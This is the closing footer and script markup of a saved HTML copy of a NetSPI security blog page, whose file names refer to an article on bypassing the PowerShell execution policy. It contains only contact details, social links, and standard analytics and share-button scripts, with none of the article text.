<span itemprop="addressLocality">Minneapolis</span>,
<span itemprop="addressRegion">MN</span>
<span itemprop="postalCode">55401<br></span>
</address>
<span itemprop="telephone">612.465.8880 Phone<br></span>
<span itemprop="telephone2">888.270.0317<br></span>
<span itemprop="faxNumber">612.455.6988 Fax</span>
</div>
<div id="social-links" class="pull-left">
<h3>Follow Us On</h3>
<ul class="unstyled">
<li><a href="https://www.facebook.com/netspi" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/facebook.jpg" alt="Facebook" height="42" width="42"></a></li>
<li><a href="http://www.youtube.com/user/NetSPI10" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/youtube.png" alt="Google" height="42" width="42"></a></li>
<li><a href="https://github.com/NetSPI" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/github.png" alt="Google" height="42" width="42"></a></li>
<li><a href="https://twitter.com/NetSPI" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/twitter.jpg" alt="Twitter" height="42" width="42"></a></li>
<li><a href="http://www.linkedin.com/company/netspi" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/linkedin.jpg" alt="LinkedIn" height="42" width="42"></a></li>
<li><a href="https://plus.google.com/s/NetSPI" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/google-plus.jpg" alt="Google+" height="42" width="42"></a></li>
<li><a href="http://www.slideshare.net/NetSPI" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/slideshare.png" alt="Google+" height="42" width="42"></a></li>
</ul>
</div>
</div>
</div>
</footer>
</div><!-- #page -->
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/form.js"></script>
<link rel="stylesheet" id="crayon-css" href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/crayon.css" type="text/css" media="all">
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/easy-social-share-buttons.js"></script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/navigation.js"></script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/skip-link-focus-fix.js"></script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/comment-reply.js"></script>
<script type="text/javascript">
/* <![CDATA[ */
var CrayonSyntaxSettings = {"version":"2.6.9","is_admin":"0","ajaxurl":"https:\/\/blog.netspi.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""};
var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"};
/* ]]> */
</script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/crayon.js"></script>
<!-- Clicky Web Analytics - http://clicky.com, WordPress Plugin by Yoast - https://yoast.com/wordpress/plugins/clicky/ -->
<script type="text/javascript">
function clicky_gc(name) {
var ca = document.cookie.split(';');
for (var i in ca) {
if (ca[i].indexOf(name + '=') != -1) {
return decodeURIComponent(ca[i].split('=')[1]);
}
}
return '';
}
var username_check = clicky_gc('comment_author_d389233f4f90d1525ddd54929b36c78e');
if (username_check) var clicky_custom_session = {username: username_check};
</script>
<script type="text/javascript">
var clicky = { log : function () { return true; }, goal: function () { return true; } };
var clicky_site_id = 100809176;
(function () {
var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = '//static.getclicky.com/js';
( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0] ).appendChild(s);
})();
</script>
<noscript><p><img alt="Clicky" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/100809176ns.gif" height="1" width="1"></p></noscript>
<script type="text/javascript">
function essb_ga_tracking(oService, oPosition, oURL) {
var essb_ga_type = "extended";
if ( 'ga' in window && window.ga !== undefined && typeof window.ga === 'function' ) {
if (essb_ga_type == "extended") {
ga('send', 'event', 'social', oService + ' ' + oPosition, oURL);
}
else {
ga('send', 'event', 'social', oService, oURL);
}
}
}
var essb_stat_data = {
'ajax_url': 'https://blog.netspi.com/wp-admin/admin-ajax.php'
};
jQuery(document).bind('essb_button_action', function (e, service, post_id) {
jQuery.post(essb_stat_data.ajax_url, {
'action': 'essb_stat_action_new',
'post_id': post_id,
'service': service,
'nonce': '2c430693ee'
}, function (data) {
if (data && data.error) {
alert(data.error);
}
},
'json'
);
});
function essb_handle_stats(service, post_id) {
jQuery(document).trigger('essb_button_action',[service, post_id]);
};
var essb_postcount_data = {
'ajax_url': 'https://blog.netspi.com/wp-admin/admin-ajax.php',
'post_id': '1107'
};
jQuery(document).bind('essb_selfpostcount_action', function (e, service, post_id) {
post_id = String(post_id);
jQuery.post(essb_postcount_data.ajax_url, {
'action': 'essb_self_postcount',
'post_id': post_id,
'service': service,
'nonce': '2c430693ee'
}, function (data) { if (data) {
//alert(data);
}},'json');});
function essb_self_postcount(service, post_id) {
jQuery(document).trigger('essb_selfpostcount_action',[service, post_id]);
};
var wnd;function essb_window_stat(oUrl, oService, oCountID) { var wnd; var w = 800 ; var h = 500; if (oService == "twitter") { w = 500; h= 300; } var left = (screen.width/2)-(w/2); var top = (screen.height/2)-(h/2); if (oService == "twitter") { wnd = window.open( oUrl, "essb_share_window", "height=300,width=500,resizable=1,scrollbars=yes,top="+top+",left="+left ); } else { wnd = window.open( oUrl, "essb_share_window", "height=500,width=800,resizable=1,scrollbars=yes,top="+top+",left="+left ); } essb_handle_stats(oService, oCountID); essb_self_postcount(oService, oCountID); var pollTimer = window.setInterval(function() {if (wnd.closed !== false) { window.clearInterval(pollTimer); essb_smart_onclose_events(oService, oCountID);}}, 200); }; function essb_pinterenst_stat(oCountID) { essb_handle_stats('pinterest', oCountID); var e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','//assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)};function essb_window(oUrl, oService, oCountID) { var wnd; var w = 800 ; var h = 500; if (oService == "twitter") { w = 500; h= 300; } var left = (screen.width/2)-(w/2); var top = (screen.height/2)-(h/2); if (oService == "twitter") { wnd = window.open( oUrl, "essb_share_window", "height=300,width=500,resizable=1,scrollbars=yes,top="+top+",left="+left ); } else { wnd = window.open( oUrl, "essb_share_window", "height=500,width=800,resizable=1,scrollbars=yes,top="+top+",left="+left ); } essb_self_postcount(oService, oCountID); var pollTimer = window.setInterval(function() {if (wnd.closed !== false) { window.clearInterval(pollTimer); essb_smart_onclose_events(oService, oCountID);}}, 200); };function essb_pinterenst() {var e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','//assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)};var essb_count_data = {
'ajax_url': 'https://blog.netspi.com/wp-admin/admin-ajax.php'
};function essb_smart_onclose_events(oService, oPostID) { if (typeof (essbasc_popup_show) == 'function') { essbasc_popup_show(); } if (typeof essb_acs_code == 'function') { essb_acs_code(oService, oPostID); } }</script><script src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/bootstrap.js" type="text/javascript"></script>
</body></html>
View Git Blame Copy Permalink